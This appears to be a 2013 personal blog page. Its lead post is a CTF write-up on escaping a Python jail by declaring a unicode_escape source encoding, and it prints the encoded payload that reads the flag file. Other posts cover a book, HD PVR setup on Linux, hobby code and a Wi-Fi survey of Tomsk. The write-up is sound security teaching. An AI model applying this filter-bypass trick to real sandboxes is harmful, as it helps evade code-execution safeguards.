Monday, December 30, 2013

30C3 CTF 2013 - Sandbox 300 PyExec writeup

Description
PyExec running on http://88.198.89.213:8080

We have sources of python jail. Need to execute code and get a flag.
But before execution almost all python keywords are filtered and regex condition is checked - it's possible to use only lowercase letters, numbers, and certain characters (parentheses, brackets, quotes, and point is prohibited!).
It's known that the first line (or second if shebang is used) of python script can be comment with source code encoding. All supported encodings can be found here: http://docs.python.org/2.6/library/codecs.html
Firstly I tried to use rot13 encoding: 
# coding: rot13
Using this one it is possible to bypass the first filter, but without a point, parentheses and quotes hard to execute all functions (it's possible using exec, and redefinition of python's string.punctuation etc).
After trying other encodings I've found unicode_escape
# coding: unicode_escape
Using this one I've bypassed python jail and executed a code.
Here is my code before encoding to unicode_escape
List files:
import os;print os.listdir('.')
['.bash_logout', 'flag.txt', 'webapp.py', '.bashrc', '.profile', '.viminfo', '.cache', '.bash_history', 'static']
Excelent, flag.txt file is found. Let's read it:
print open('flag.txt').read()
After coding to unicode_escape:
# coding: unicode_escape
\x70\x72\x69\x6e\x74\x20\x6f\x70\x65\x6e\x28\x22\x66\x6c\x61\x67\x2e\x74\x78\x74\x22\x29\x2e\x72\x65\x61\x64\x28\x29

We get a flag: 30C3_2a2766d9cf4a137d517a8227bd71d59d

Thursday, November 28, 2013

Hackers: Heroes of the Computer Revolution

I've just finished reading of excellent book "Hackers: Heroes of the Computer Revolution" by Steven Levy.


Very recommend to everyone who involved with the computers, gamedev, electronics, hacking, etc.

After reading I recommend also to watch a movie Pirates of Silicon Valley. Some events and characters have parallels with events from the book.

First part about first true hackers was really new for me, may be because second part (about hardware hackers) is more commonly known and popular due to the reflection in cinema, documentary films.
Chapters about game development companies, game hackers and birth of first games are very exciting. I remember these interesting games by Sierra Online, like Mystery House, King's Quest, Space Quest and other with beautiful graphics and addictive story.

PS. I've read a version with a new afterword "Afterword: Ten Years After" with latest information about some characters. Wikipedia said, that in 2010, updated 25th anniversary edition was published.

Saturday, November 16, 2013

Hauppauge HD PVR and Linux

Last week I've tried to run Hauppauge HD PVR under Linux (Ubuntu 12.04), after successful run under Windows 7.
After reading and trying things from http://www.mythtv.org/wiki/Hauppauge_HD-PVR, I've still found that command of reading stream from device is executed with error:
cat /dev/video1 > test.ts
cat: /dev/video1: Input/output error

Later I found that if there are no video cables (with some signal of course) connected to HD PVR, this error is occures, unlike Windows if no cable is connected we have blue screen as output signal.

After connection of component (YPbPr) video cable, you need to configure default video input of your HD PVR device. You can do it with next commands:
rmmod hdpvr
modprobe hdpvr hdpvr_debug=1 default_video_input=0

Default video input values for HD PVR
0=Component (YPbPr)
1=S-Video
2=Composite

Or using v4l2-ctl tool (from v4l2-utils package).
sudo v4l2-ctl -d /dev/video1 --set-input=0

After that, I've successfully captured video stream from HD PVR.

Friday, November 8, 2013

C function argument name

Reading some source code I stumbled upon a funny function argument name. :)

Thursday, October 24, 2013

Friday, October 18, 2013

Text to Morse code wave converter

Just published a new tool in Python called morse wave on github. This tool is allows you to convert some text into Morse code and save to wav file.

Thursday, October 3, 2013

Arkanoid game in JavaScript and HTML5 Canvas

I've continued to make projects in JavaScript and HTML canvas. This time I've made famous arkanoid game.
Source code of game is available on my github repository here.

Saturday, September 14, 2013

Programmers Day 2013

Happy Programmers' Day 2013!!!
Two IT professional days were on this week: Software Tester (QA) day on September 9 and Programmers' Day on September 13 (btw Friday the 13th). We celebrated with a special delicious IT cake. Happy QA && Programmer days!

Saturday, August 31, 2013

Fractals

Yesterday I've added a new repository (fractals-js) on github. It's dedicated to fractals visualization. For visualizing is used JavaScript and HTML5 Canvas.
First added visualization is visualization of the famous Mandelbrot set. Fractal images with different colors:
Visualizations of the Mandelbrot set

Second added visualization is Julia set. Below the images for different complex parameter and colors:
Visualizations of the Julia set

The next added visualization is Burning Ship fractal:
Visualizations of the Burning Ship fractal

Fourth added visualization is Sierpinski carpet:
Visualizations of the Sierpinski carpet fractal

Tuesday, August 20, 2013

Saturday, August 17, 2013

YAGNI

В разработке программного обеспечения существует принцип «YAGNI» (англ. You Ain't Gonna Need It — «Вам это не понадобится»). Забавно, то, что в казахском языке есть созвучный союз «яғни» — переводится «то есть».

Friday, July 26, 2013

New TSU dorm

Новое общежитие ТГУ на карте выглядит так:
Star Trek повлиял :)

Monday, July 1, 2013

Анализ Wi-Fi сетей Томска

На протяжении нескольких недель я проводил исследование и собирал статистику по Wi-Fi сетям в городе.
В самом начале оценивал максимальное количество сетей в 15 тысяч. Сейчас считаю, что максимальное количество больше (учитывая внутренние дворы). Для сбора старался обойти весь город, по крайней мере, главные улицы. Получилось в общем 12842 уникальных сетей (определял уникальность по MAC-адресу).
Вот некоторая статистика по собранным сетям.
Статистика топ-5 Wi-Fi устройств в городе:
Устройство
Кол-во
D-Link
1379
ASUS
628
TP-LINK
392
ZyXEL
264
NETGEAR
203

Статистика используемых типов шифрования:
Тип шифрования
Кол-во
[WPA2-PSK-CCMP]
2115
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP][WPS][WPS]
1889
[WPA2-PSK-CCMP][WPS][WPS]
1503
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP]
1304
[Not Encrypted]
848
[WPA-PSK-TKIP]
551
[WPA-PSK-TKIP+CCMP][WPS][WPS]
469
[WPA2-PSK-TKIP+CCMP][WPS][WPS]
424
[WPA-PSK-CCMP][WPA2-PSK-CCMP][WPS][WPS]
369
[WPA-PSK-CCMP][WPA2-PSK-CCMP]
298
[WPA-PSK-CCMP]
292
[WPA2-PSK-TKIP]
290
[WPA2-PSK-TKIP+CCMP]
235
[WPS][WPS]
214
[WPA-EAP-TKIP][WPA2-EAP-CCMP]
212
[WPA-PSK-TKIP][WPA2-PSK-TKIP]
206
[WEP]
204
[WPA-PSK-TKIP][WPS][WPS]
187
[WPS][WPS][WEP]
169
[WPA-PSK-TKIP][WPA2-PSK-TKIP][WPS][WPS]
140
[WPA2-PSK-TKIP][WPS][WPS]
108
[WPA-PSK-TKIP+CCMP][WPA2-PSK-CCMP]
107
[WEP][IBSS]
106
[WPA-PSK-TKIP+CCMP]
100
[IBSS]
88
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP-preauth]
82
[WPA-PSK-CCMP][WPS][WPS]
66
[WPA2-PSK-TKIP+CCMP-preauth]
49
[WPA-PSK-TKIP][WPA2-PSK-CCMP]
39
[WPA2-PSK-CCMP][IBSS]
37
[WPA-EAP-TKIP+CCMP][WPA2-EAP-TKIP+CCMP]
32
[WPA2-PSK-CCMP-preauth]
26
[WPA-PSK-TKIP][WPA2-PSK-CCMP][WPS][WPS]
16
[WPA2-PSK-TKIP-preauth]
15
[WPA2-EAP-CCMP]
7
[WPA-PSK-CCMP][WPA2-PSK-CCMP-preauth]
6
[WPA-PSK-TKIP][WPA2-PSK-TKIP-preauth]
5
[WPA-PSK-TKIP][WPA2-PSK-TKIP+CCMP]
4
[WPA2-EAP-CCMP-preauth]
4
[WPA-PSK-TKIP+CCMP][WPA2-PSK-TKIP+CCMP-preauth][WPS][WPS]
3
[WPA-EAP-TKIP]
3
[WPA-PSK-TKIP][WPA2-PSK-CCMP-preauth]
2
[WPA2-PSK-CCMP][WPS-PIN][WPS-PIN]
2
[WPS-PIN][WPS-PIN]
2
[WPA-?][WPA2-PSK-CCMP][WPS-PIN][WPS-PIN]
2
[WPA2-PSK-CCMP-preauth][WPS][WPS]
1
[WPA-EAP-CCMP][WPA2-EAP-CCMP]
1
[WPA2-PSK-TKIP+CCMP-preauth][WPS][WPS]
1
[WPA-PSK-TKIP][WPA2-PSK-TKIP+CCMP][WPS][WPS]
1
[WPA-PSK-CCMP][WPS-PIN][WPS-PIN]
1
[WPA2-PSK-TKIP-preauth][WPS][WPS]
1
[WPA2-?]
1
[WPA2--TKIP+CCMP]
1
[WPS-PBC][WPS-PBC]
1
[WPA-PSK-TKIP+CCMP][WPA2-PSK-CCMP-preauth]
1
[WPA-?][WPA2-PSK-CCMP][WPS][WPS]
1
[WPA-PSK-TKIP][WPS-PIN][WPS-PIN]
1

Что касается безопасности, то 848 из 12842 сетей оказались не зашифрованными (открытыми) и 204 сети используют небезопасное WEP шифрование. В принципе неплохо.
Статистика по количеству Wi-Fi-устройств работающих на частотах (каналах):
Частота (Канал)
Кол-во
2412 (1)
3548
2437 (6)
2378
2462 (11)
2250
2417 (2)
731
2452 (9)
565
2472 (13)
549
2427 (4)
523
2457 (10)
506
2432 (5)
473
2422 (3)
384
2442 (7)
369
2467 (12)
310
2447 (8)
256

Как видно из таблицы найденные беспроводные сети используют 13 каналов частотного диапазона 2,4 ГГц, то есть используют стандарт 802.11b/g/n. Также видно, что самый свободный 8 канал.

Топ-50 открытых сетей:
Устройство
Кол-во
TPU Press
74
TPU Guest
69
DIR-300NRU
54
DOM.RU Wi-Fi
42
ASUS
36
TSUNet
34
tusur
31
DIR-300
30
DIR-620
21
DIR-300NRUB6
20
default
19
DIR-320NRU
17
DIR-615
15
DIR-300NRUB7
10
DIR-300NRU.2
10
wifi_1
9
dlink
7
Magistrat_Free_Wifi
7
CITYADM_LDAP
6
RFF-Sky
6
library
5
DIR-300NRUB5
5
MikroTik
5
rubifi
4
Bon
4
DAP-1360
4
AndroidAP
3
UPVEL UR-315BN
3
TSPU Guest
3
Forum
3
TSPU
3
M-Video_Free_WiFi
3
mag
3
BHR
3
kruger
2
dd-wrt
2
MegaFon
2
TSUNet_Library
2
kosmos
2
TOMLINE_FOR_SBERBANK
2
dns_open
2
guest
2
DOMRU Guest
2
DL VAP w1 g
2
NETGEAR
2
Beeline_router
2
stg-guest
2
DIR-300-Yan
1
tomdent888
1
FTF Wireless Network
1

Из всех найденных сетей всего около 80 используют не латинские символы в названии сети.
Также среди названий сетей встречалось очень много креатива, хотя многие называют сети по имени или фамилии, названию компании, кто-то даже использует адрес и номер квартиры или даже айдишник социальной сети.
Топ-50 популярных названий сетей:
Устройство
Кол-во
ASUS
419
dlink
258
DIR-300NRU
252
NETGEAR
158
DIR-615
146
DIR-300
110
DIR-620
88
DIR-300NRUB6
83
TPU Press
74
TPU Public
72
TPU VIP
71
TPU Hostels
70
TPU Guest
69
default
66
Home
65
DIR-320NRU
62
Connectify-me
59
DSL-2640U
51
DIR-300NRUB7
48
ELTEX_NTP-RG14xxG-W
48
beeline-router
47
DOM.RU Wi-Fi
42
ELTEX_NTERG14xxG-W
41
home
38
ZyXEL
38
TSUNet
34
YOTA
34
tusur
31
test-tusur
29
dd-wrt
27
TP-LINK
25
DIR-300NRUB5
20
Tenda
18
HomeNet
17
mag
17
tomtel
15
Guest
14
linksys
14
TRENDnet
14
TRENDnet652
14
AndroidAP
13
WiFi-DOM.ru-6111
13
asus
12
Beeline_router
11
Elena
11
HOME
11
TRENDnet651
11
wifi
11
Wi-Fi
11
DIR-300NRU.2
10

Для сбора использовал самописную программу под Android.